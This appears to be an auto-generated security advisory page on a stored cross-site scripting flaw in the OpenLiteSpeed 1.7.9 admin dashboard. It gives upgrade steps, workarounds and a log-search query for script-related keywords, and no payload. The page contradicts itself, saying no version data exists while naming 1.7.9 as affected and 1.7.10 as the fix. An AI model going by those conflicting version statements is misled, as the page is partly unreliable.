CVE-2021-47855
📋 TL;DR
OpenLiteSpeed 1.7.9 contains a stored cross-site scripting vulnerability in the dashboard's Notes parameter that allows attackers to inject malicious scripts. When administrators click on the Default Icon in listener configuration, the malicious payload executes, potentially compromising administrative sessions. This affects OpenLiteSpeed administrators using version 1.7.9.
💻 Affected Systems
- OpenLiteSpeed
⚠️ Manual Verification Required
This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.
Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).
🔒 Custom verification scripts are available for registered users. Sign up free to download automated test scripts.
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Complete administrative account takeover leading to server compromise, data theft, or deployment of backdoors.
Likely Case
Session hijacking of administrator accounts, unauthorized configuration changes, or credential theft.
If Mitigated
Limited impact if administrators use separate accounts with minimal privileges and browser security features.
🎯 Exploit Status
Exploitation requires administrative access to inject payload into Notes field.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 1.7.10 or later
Vendor Advisory: https://openlitespeed.org/news/openlitespeed-1-7-10-released/
Restart Required: Yes
Instructions:
1. Backup current configuration. 2. Download OpenLiteSpeed 1.7.10 or later from openlitespeed.org. 3. Stop OpenLiteSpeed service. 4. Install new version. 5. Restart OpenLiteSpeed service. 6. Verify version with 'litespeed -v'.
🔧 Temporary Workarounds
Input Sanitization
allManually sanitize Notes field input to prevent script injection.
# No direct command - requires code modification
Access Restriction
linuxRestrict administrative dashboard access to trusted IP addresses only.
# Configure firewall rules to limit access to OpenLiteSpeed admin port (7080 by default)
🧯 If You Can't Patch
- Implement strict input validation for Notes field in configuration files.
- Use Content Security Policy headers to prevent script execution in admin interface.
🔍 How to Verify
Check if Vulnerable:
Check OpenLiteSpeed version with 'litespeed -v' or via admin dashboard. If version is 1.7.9, system is vulnerable.Check Version:
litespeed -vVerify Fix Applied:
Verify version is 1.7.10 or later with 'litespeed -v'. Test Notes field with basic XSS payload to confirm sanitization.📡 Detection & Monitoring
Log Indicators:
- Unusual administrative login patterns
- Configuration changes to listener settings
- JavaScript execution in admin interface logs
Network Indicators:
- Unexpected outbound connections from admin interface
- Suspicious payloads in HTTP requests to admin port
SIEM Query:
source="openlitespeed.log" AND ("Notes" OR "listener" OR "admin") AND ("script" OR "javascript" OR "onclick")